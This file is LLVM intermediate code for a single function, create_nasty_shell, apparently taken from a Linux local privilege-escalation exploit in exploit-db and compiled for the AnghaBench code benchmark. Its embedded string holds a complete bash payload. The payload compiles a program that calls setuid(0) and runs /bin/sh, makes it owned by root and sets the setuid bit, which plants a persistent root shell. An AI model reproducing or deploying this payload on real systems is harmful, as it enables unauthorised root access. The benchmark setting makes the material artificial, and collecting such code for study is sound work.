; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_38357.c_create_nasty_shell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_38357.c_create_nasty_shell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [140 x i8] c"#!/bin/bash\0Aecho 'main(){setuid(0);execve(\22/bin/sh\22,0,0);}'>/tmp/sh.c\0Acc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\0Achmod 4755 /tmp/sh;\0A\00", align 1
@O_CREAT = common dso_local global i32 0, align 4
@O_RDWR = common dso_local global i32 0, align 4
@S_IRWXU = common dso_local global i32 0, align 4
@S_IRWXG = common dso_local global i32 0, align 4
@S_IRWXO = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @create_nasty_shell(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca i32, align 4
  store i8* %0, i8** %2, align 8
  store i8* getelementptr inbounds ([140 x i8], [140 x i8]* @.str, i64 0, i64 0), i8** %3, align 8
  %5 = load i8*, i8** %2, align 8
  %6 = load i32, i32* @O_CREAT, align 4
  %7 = load i32, i32* @O_RDWR, align 4
  %8 = or i32 %6, %7
  %9 = load i32, i32* @S_IRWXU, align 4
  %10 = load i32, i32* @S_IRWXG, align 4
  %11 = or i32 %9, %10
  %12 = load i32, i32* @S_IRWXO, align 4
  %13 = or i32 %11, %12
  %14 = call i32 @open(i8* %5, i32 %8, i32 %13)
  store i32 %14, i32* %4, align 4
  %15 = load i32, i32* %4, align 4
  %16 = load i8*, i8** %3, align 8
  %17 = load i8*, i8** %3, align 8
  %18 = call i32 @strlen(i8* %17)
  %19 = call i32 @write(i32 %15, i8* %16, i32 %18)
  %20 = load i32, i32* %4, align 4
  %21 = call i32 @close(i32 %20)
  ret i32 0
}

declare dso_local i32 @open(i8*, i32, i32) #1

declare dso_local i32 @write(i32, i8*, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @close(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
